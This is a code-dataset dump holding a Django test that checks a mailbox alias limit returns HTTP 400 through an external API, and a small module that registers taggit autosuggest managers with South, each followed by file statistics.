def test_mailbox_aliases_limit(self):
"""Check mailbox_aliases limit."""
domain = Domain.objects.get(name="test.com")
limit = domain.domainobjectlimit_set.get(name="mailbox_aliases")
self.assertTrue(limit.is_exceeded())
url = reverse("external_api:alias-list")
data = {
"address": "alias_fromapi@test.com",
"recipients": [
"user@test.com", "postmaster@test.com", "user_éé@nonlocal.com"
]
}
response = self.client.post(url, data, format="json")
self.assertEqual(response.status_code, 400)
| 39.382353 | 78 | 0.621253 | 1,043 | 9,373 | 5.458293 | 0.126558 | 0.031969 | 0.066397 | 0.062709 | 0.835412 | 0.805024 | 0.762164 | 0.739329 | 0.720183 | 0.708765 | 0 | 0.01482 | 0.244105 | 9,373 | 237 | 79 | 39.548523 | 0.788709 | 0.040862 | 0 | 0.670157 | 0 | 0 | 0.164388 | 0.038436 | 0 | 0 | 0 | 0 | 0.17801 | 1 | 0.052356 | false | 0.020942 | 0.04712 | 0 | 0.109948 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5d3aa2b24de34ed5c43724015ce47ad1e4d045bc | 199 | py | Python | taggit_autosuggest_select2/models.py | iris-edu-int/django-taggit-autosuggest-select2 | 280cd312e76b042d66eb32fe21020e37e1830343 | [
"MIT"
] | 1 | 2017-07-10T19:58:55.000Z | 2017-07-10T19:58:55.000Z | taggit_autosuggest_select2/models.py | iris-edu-int/django-taggit-autosuggest-select2 | 280cd312e76b042d66eb32fe21020e37e1830343 | [
"MIT"
] | null | null | null | taggit_autosuggest_select2/models.py | iris-edu-int/django-taggit-autosuggest-select2 | 280cd312e76b042d66eb32fe21020e37e1830343 | [
"MIT"
] | null | null | null | try:
from south.modelsinspector import add_ignored_fields
    add_ignored_fields([r"^taggit_autosuggest_select2\.managers"])
except ImportError:
    pass  # South is optional; skip silently when it's not installed
| 28.428571 | 65 | 0.778894 | 24 | 199 | 6.208333 | 0.833333 | 0.134228 | 0.214765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.155779 | 199 | 6 | 66 | 33.166667 | 0.880952 | 0.180905 | 0 | 0 | 0 | 0 | 0.229814 | 0.229814 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 6 |